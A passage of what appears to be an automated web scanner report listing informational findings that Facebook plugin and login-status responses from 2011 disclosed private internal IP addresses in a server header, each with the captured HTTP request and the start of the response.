...[SNIP]...

21.45. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=180186532021462&app_id=180186532021462&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df68b7844%26origin%3Dhttp%253A%252F%252Fwww.bradsdeals.com%252Ff98e336e8%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df31c03035%26origin%3Dhttp%253A%252F%252Fwww.bradsdeals.com%252Ff98e336e8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df193829294%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1d5bd7b84%26origin%3Dhttp%253A%252F%252Fwww.bradsdeals.com%252Ff98e336e8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df193829294&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df34dba20a4%26origin%3Dhttp%253A%252F%252Fwww.bradsdeals.com%252Ff98e336e8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df193829294&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3697043f4%26origin%3Dhttp%253A%252F%252Fwww.bradsdeals.com%252Ff98e336e8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df193829294&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bradsdeals.com/dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.170.59
X-Cnection: close
Date: Sat, 17 Sep 2011 01:04:17 GMT
Content-Length: 247

<script type="text/javascript">
parent.postMessage("cb=f34dba20a4&origin=http\u00253A\u00252F\u00252Fwww.bradsdeals.com\u00252Ff98e336e8&relation=parent&transport=postmessage&frame=f193829294", "http:
...[SNIP]...

21.46. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=374095054754&app_id=374095054754&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3366b8744%26origin%3Dhttp%253A%252F%252Fbeta.abc.go.com%252Ff1aa4092c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1a8669bf8%26origin%3Dhttp%253A%252F%252Fbeta.abc.go.com%252Ff1aa4092c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3dd22b17c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3c126a688%26origin%3Dhttp%253A%252F%252Fbeta.abc.go.com%252Ff1aa4092c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3dd22b17c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfa5b991c4%26origin%3Dhttp%253A%252F%252Fbeta.abc.go.com%252Ff1aa4092c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3dd22b17c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df196aa5474%26origin%3Dhttp%253A%252F%252Fbeta.abc.go.com%252Ff1aa4092c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3dd22b17c&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels/bios/eve-french
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM; lsd=JJyyQ

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.22.39
X-Cnection: close
Date: Sat, 17 Sep 2011 00:58:07 GMT
Content-Length: 240

<script type="text/javascript">
parent.postMessage("cb=fa5b991c4&origin=http\u00253A\u00252F\u00252Fbeta.abc.go.com\u00252Ff1aa4092c&relation=parent&transport=postmessage&frame=f3dd22b17c", "http:\/\/
...[SNIP]...

21.47. http://www.facebook.com/plugins/activity.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/activity.php?site=http%253A%252F%252Fbostonherald.com&width=300&height=300&header=true&colorscheme=light&font&border_color HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/national/?type=rem911
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.25.35
X-Cnection: close
Date: Sat, 17 Sep 2011 01:32:22 GMT
Content-Length: 9973

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/plugins\/activity.php";window._EagleEyeSeed="o7ju";</scri
...[SNIP]...

21.48. http://www.facebook.com/plugins/activity.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/activity.php?site=abc.go.com&width=274&height=406&header=false&colorscheme=light&font=tahoma&recommendations=true HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM; lsd=JJyyQ

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.169.37
X-Cnection: close
Date: Sat, 17 Sep 2011 01:02:49 GMT
Content-Length: 16940

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/plugins\/activity.php";window._EagleEyeSeed="dnaC";</scri
...[SNIP]...

21.49. http://www.facebook.com/plugins/facepile.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/facepile.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/facepile.php?action=like&api_key=180186532021462&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df22a9c1b6c%26origin%3Dhttp%253A%252F%252Fwww.bradsdeals.com%252Ff98e336e8%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&extended_social_context=false&href=http%3A%2F%2Fwww.facebook.com%2Fbradsdeals&locale=en_US&login_text=&max_rows=1&sdk=joey&size=small&tense=past&width=200 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bradsdeals.com/dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.1.38
X-Cnection: close
Date: Sat, 17 Sep 2011 01:38:10 GMT
Content-Length: 7538

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/plugins\/facepile.php";window._EagleEyeSeed="pNsB";</scri
...[SNIP]...

21.50. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?action=like&api_key=127075842605&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3272cdf48%26origin%3Dhttp%253A%252F%252Fwww.tmz.com%252Ff2c51297b%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&font=arial&href=http%3A%2F%2Fwww.tmz.com%2F2011%2F09%2F16%2Fnancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars%2F&layout=button_count&locale=en_US&node_type=link&ref=.TnQ10R7wSjg.like&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.133.21
X-Cnection: close
Date: Sat, 17 Sep 2011 00:53:26 GMT
Content-Length: 26122

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

21.51. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?action=like&api_key=127075842605&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2719107c%26origin%3Dhttp%253A%252F%252Fwww.tmz.com%252Ff2c51297b%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&font=arial&href=http%3A%2F%2Fwww.tmz.com%2F2011%2F09%2F16%2Fron-artest-name-change-official-metta-world-peace-legal-judge-petition-granted-lakers%2F&layout=button_count&locale=en_US&node_type=link&ref=.TnQ10R0j4cs.like&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.21.51
X-Cnection: close
Date: Sat, 17 Sep 2011 00:52:23 GMT
Content-Length: 26130

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

21.52. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?api_key=116046798441464&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df244d518a4%26origin%3Dhttp%253A%252F%252Fwww.toofab.com%252Ff187237d1c%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&href=http%253A%252F%252Fwww.toofab.com%252F2011%252F09%252F15%252Fashlee-simpson-vincent-piazza-boardwalk-empire-premiere-photos%252F&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/2011/09/15/ashlee-simpson-vincent-piazza-boardwalk-empire-premiere-photos/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM; lsd=JJyyQ

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.152.64
X-Cnection: close
Date: Sat, 17 Sep 2011 01:08:55 GMT
Content-Length: 25092

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

21.53. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?action=like&api_key=127075842605&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfc7caa1f%26origin%3Dhttp%253A%252F%252Fwww.tmz.com%252Ff2c51297b%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&font=arial&href=http%3A%2F%2Fwww.tmz.com%2F2011%2F09%2F16%2Fjennifer-aniston-justin-theroux-holding-hands-brad-pitt-nyc-dull%2F&layout=button_count&locale=en_US&node_type=link&ref=.TnQ10TvVM-M.like&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.8.77
X-Cnection: close
Date: Sat, 17 Sep 2011 00:52:23 GMT
Content-Length: 26083

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

21.54. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?action=like&api_key=127075842605&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df398fe9fa8%26origin%3Dhttp%253A%252F%252Fwww.tmz.com%252Ff30d8dd9c8%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&font=arial&href=http%3A%2F%2Fwww.tmz.com%2F2011%2F09%2F16%2Fnancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars%2F&layout=button_count&locale=en_US&node_type=link&ref=.TnQ2Z7E1ISw.like&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/16/nancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.252.21
X-Cnection: close
Date: Sat, 17 Sep 2011 00:54:45 GMT
Content-Length: 26221

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

21.55. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?action=like&api_key=223691147655074&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df13d3f55c4%26origin%3Dhttp%253A%252F%252Fbostonherald.com%252Ff3b6295d4%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&font=Arial&href=http%3A%2F%2Fbostonherald.com%2Ftrack%2Finside_track%2Fview.bg%3Farticleid%3D1366225%26srvc%3Dtrack%26position%3D2&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=false&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/track/inside_track/view.bg?articleid=1366225&srvc=track&position=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.130.34
X-Cnection: close
Date: Sat, 17 Sep 2011 01:06:20 GMT
Content-Length: 25161

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

21.56. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?action=like&api_key=127075842605&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2c8720014%26origin%3Dhttp%253A%252F%252Fwww.tmz.com%252Ff2c51297b%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&font=arial&href=http%3A%2F%2Fwww.tmz.com%2F2011%2F09%2F16%2Fmatthew-fox-heather-borman-lawsuit-accused-punching-bus-fight-stomach-cleveland-ohio-drunk-lost-attack-fight%2F&layout=button_count&locale=en_US&node_type=link&ref=.TnQ10Q6hpJg.like&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.146.77
X-Cnection: close
Date: Sat, 17 Sep 2011 00:52:23 GMT
Content-Length: 26128

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

21.57. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?api_key=116046798441464&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df34e0507d8%26origin%3Dhttp%253A%252F%252Fwww.toofab.com%252Ff1815548cc%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&href=http%253A%252F%252Fwww.toofab.com%252F2011%252F09%252F15%252Fkristin-cavallari-defends-chaz-bono-leave-him-alone%252F&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.19.35
X-Cnection: close
Date: Sat, 17 Sep 2011 00:50:38 GMT
Content-Length: 25003

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

21.58. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?action=like&api_key=127075842605&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1539accf8%26origin%3Dhttp%253A%252F%252Fwww.tmz.com%252Ff2c51297b%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&font=arial&href=http%3A%2F%2Fwww.tmz.com%2F2011%2F09%2F16%2Ftareq-salahi-michaele-files-for-divorce-penis-picture-adultery-neal-schon-journey-abandonment-affair%2F&layout=button_count&locale=en_US&node_type=link&ref=.TnQ10QgEQw8.like&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.144.37
X-Cnection: close
Date: Sat, 17 Sep 2011 00:52:23 GMT
